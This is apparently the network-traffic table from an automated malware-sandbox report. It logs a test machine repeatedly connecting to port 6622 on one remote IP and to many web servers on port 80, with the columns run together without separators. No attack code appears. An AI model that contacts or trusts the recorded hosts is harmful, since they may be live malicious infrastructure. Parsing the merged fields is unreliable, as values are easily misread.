                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.166821003 CEST501986622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.173160076 CEST501986622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.178056955 CEST662250198204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.271954060 CEST805019635.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.272123098 CEST5019680192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.272274971 CEST805019635.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.272325993 CEST5019680192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.277358055 CEST805019635.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.422461033 CEST5019980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.428185940 CEST805019918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.428267002 CEST5019980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.453782082 CEST5019980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.453810930 CEST5019980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.460397005 CEST805019918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.460684061 CEST805019918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.833110094 CEST805019734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.833343029 CEST5019780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.833600998 CEST805019734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.833652020 CEST5019780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.838396072 CEST805019734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.023252010 CEST5020080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.028639078 CEST805020034.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.029045105 CEST5020080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.029174089 CEST5020080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.029206038 CEST5020080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.034152985 CEST805020034.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.034526110 CEST805020034.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.649933100 CEST662250198204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.650001049 CEST501986622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.678220034 CEST501986622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.683428049 CEST662250198204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.742168903 CEST805020034.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.742445946 CEST805020034.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.742585897 CEST5020080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.767668009 CEST805019918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.767705917 CEST805019918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.767839909 CEST5019980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.192871094 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.192898035 CEST5013280192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.201365948 CEST5020080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.214143038 CEST5019980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.333031893 CEST502016622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.535785913 CEST5020080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.598283052 CEST5013280192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.598284960 CEST5019980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.598288059 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642009020 CEST805020034.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642026901 CEST805019918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642040968 CEST662250201204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642055988 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642066002 CEST805013285.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642122030 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642168999 CEST502016622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642170906 CEST5013280192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642653942 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642663956 CEST805013285.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642822981 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642832994 CEST5013280192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.643811941 CEST805020034.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.643824100 CEST805019918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.643834114 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.643867970 CEST5020080192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.643932104 CEST5019980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.644048929 CEST805013285.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.646486044 CEST502016622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.648302078 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.648317099 CEST805013285.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.651911974 CEST662250201204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.662951946 CEST5020280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.668118954 CEST805020234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.668752909 CEST5020280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.669018030 CEST5020280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.669050932 CEST5020280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.674063921 CEST805020234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.674082994 CEST805020234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.799021006 CEST5020380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.805629969 CEST8050203208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.805845976 CEST5020380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.806413889 CEST5020380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.806716919 CEST5020380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.812340975 CEST8050203208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.812685013 CEST8050203208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.310046911 CEST8050203208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.404738903 CEST5020380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.404778957 CEST5020380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.409836054 CEST8050203208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.409962893 CEST8050203208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.441169977 CEST805020234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.441565037 CEST805020234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.441606045 CEST5020280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.468413115 CEST5020280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.473507881 CEST805020234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.522634029 CEST8050203208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.551539898 CEST5020480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.557569981 CEST805020444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.560678959 CEST5020480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.560887098 CEST5020480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.560913086 CEST5020480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.565790892 CEST805020444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.565818071 CEST805020444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.598274946 CEST5020380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.063618898 CEST805020444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.064307928 CEST805020444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.064614058 CEST5020480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.135324001 CEST662250201204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.137660027 CEST502016622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.138453960 CEST502016622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.143704891 CEST662250201204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.836303949 CEST502056622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.887255907 CEST662250205204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:51.888444901 CEST502056622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.064304113 CEST502056622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.070204020 CEST662250205204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.477566004 CEST5020480192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.482986927 CEST805020444.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.551757097 CEST5020680192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.556725979 CEST805020647.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.556793928 CEST5020680192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.558598995 CEST5020780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.559083939 CEST5020680192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.559112072 CEST5020680192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.564115047 CEST805020744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.564129114 CEST805020647.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.564140081 CEST805020647.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.564614058 CEST5020780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.577142954 CEST5020780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.577609062 CEST5020780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.582125902 CEST805020744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.582624912 CEST805020744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.056322098 CEST805020744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.057116985 CEST805020744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.057171106 CEST5020780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.062462091 CEST5020780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.067500114 CEST805020744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.345607042 CEST662250205204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.345689058 CEST502056622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.345732927 CEST502056622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.351399899 CEST662250205204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.447722912 CEST5020880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.452938080 CEST805020834.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.453012943 CEST5020880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.453243971 CEST5020880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.453283072 CEST5020880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.458239079 CEST805020834.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.458875895 CEST805020834.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.919080973 CEST805020647.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.919346094 CEST805020647.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.919675112 CEST5020680192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.952065945 CEST5020680192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.957050085 CEST805020647.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.959553003 CEST502096622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.964567900 CEST662250209204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.964637995 CEST502096622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.969279051 CEST502096622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.974550962 CEST662250209204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.026336908 CEST5021080192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.031537056 CEST805021013.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.031618118 CEST5021080192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.031776905 CEST5021080192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.031799078 CEST5021080192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.036910057 CEST805021013.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.037062883 CEST805021013.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.194046021 CEST805020834.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.194273949 CEST5020880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.195203066 CEST805020834.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.196629047 CEST5020880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.201749086 CEST805020834.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.522229910 CEST5021180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.527218103 CEST805021118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.527465105 CEST5021180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.527631998 CEST5021180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.527652025 CEST5021180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.532547951 CEST805021118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.532560110 CEST805021118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.014065027 CEST805021118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.014441967 CEST805021118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.014647007 CEST5021180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.016804934 CEST5021180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.022037029 CEST805021118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.386248112 CEST805021013.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.386398077 CEST5021080192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.386604071 CEST805021013.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.386657953 CEST5021080192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.391756058 CEST5021280192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.393418074 CEST805021013.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.398622990 CEST80502123.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.398701906 CEST5021280192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.398916960 CEST5021280192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.398937941 CEST5021280192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.402590036 CEST5021380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.404112101 CEST80502123.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.404910088 CEST80502123.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.408216000 CEST805021318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.408427954 CEST5021380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.408727884 CEST5021380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.408746958 CEST5021380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.413908958 CEST805021318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.414174080 CEST805021318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.456929922 CEST662250209204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.457123041 CEST502096622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.457173109 CEST502096622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.463138103 CEST662250209204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.880486965 CEST805021318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.881237984 CEST805021318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.882519960 CEST5021380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.894576073 CEST5021380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.899756908 CEST805021318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.956432104 CEST5021480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.962956905 CEST805021444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.965611935 CEST5021480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.972193003 CEST5021480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.972225904 CEST5021480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.977370977 CEST805021444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.977557898 CEST805021444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.063169956 CEST502156622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.068408966 CEST662250215204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.068516016 CEST502156622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.073571920 CEST502156622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.079401016 CEST662250215204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.317397118 CEST80502123.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.317620039 CEST80502123.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.317682028 CEST5021280192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.326946020 CEST5021280192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.331913948 CEST80502123.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.425350904 CEST805021444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.427122116 CEST805021444.221.84.105192.168.2.4
